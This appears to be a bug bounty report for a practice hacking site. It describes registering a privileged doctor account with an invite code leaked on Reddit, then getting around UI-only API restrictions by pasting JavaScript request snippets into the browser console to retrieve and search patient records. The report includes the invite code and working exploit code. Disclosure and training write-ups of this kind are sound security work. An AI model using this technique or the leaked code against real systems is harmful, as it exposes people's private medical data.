BugBountyHunter

Summary:

• On r/BugBountyHunter someone has leaked their doctor registration unique invite code. Using this invite code I was able to create an admin account on firstbloodhackers.com.

• After logging into the account there was a warning and all API calls where restricted on the admin dashboard.

• Even though the API calls are restricted and we are unable to view users information on UI, They are only restricted on UI we can use our cookies and make those calls and retrieve the patients information.

  Url to the post: https://www.reddit.com/r/BugBountyHunter/comments/n4xzw1/firstbloodhackerscom_doctor_registration/

  Invite code: F16CA47250E445888824A9E63AE445CE

Steps To Reproduce:

1. Visit registration form enter some username and on invite code enter this F16CA47250E445888824A9E63AE445CE
2. After this you'll be given a password, Copy it and Login
3. On Dashboard you'll notice that you are not allowed to view users/patient's information.

4. Paste this code on your browser console:

   • To get information of an application (Patient) :

     var xhr = new XMLHttpRequest();
     xhr.open("GET", 'drapi/query.php?aptid={application-id}', true); //replace with application id
     
     xhr.onreadystatechange = function() {
         if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
             alert(this.responseText);
             } else { } }
     xhr.send();

   • To search for a patient:

     var xhr = new XMLHttpRequest();
     xhr.open("POST", 'drapi/qp.php', true);
     xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
     
     xhr.onreadystatechange = function() {
       if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
          alert(this.responseText);
              } else { } }
     xhr.send("name={name-here}"); //replace with name

Impact:

• An attacker use this invite code and create a account and retrieve all patients information.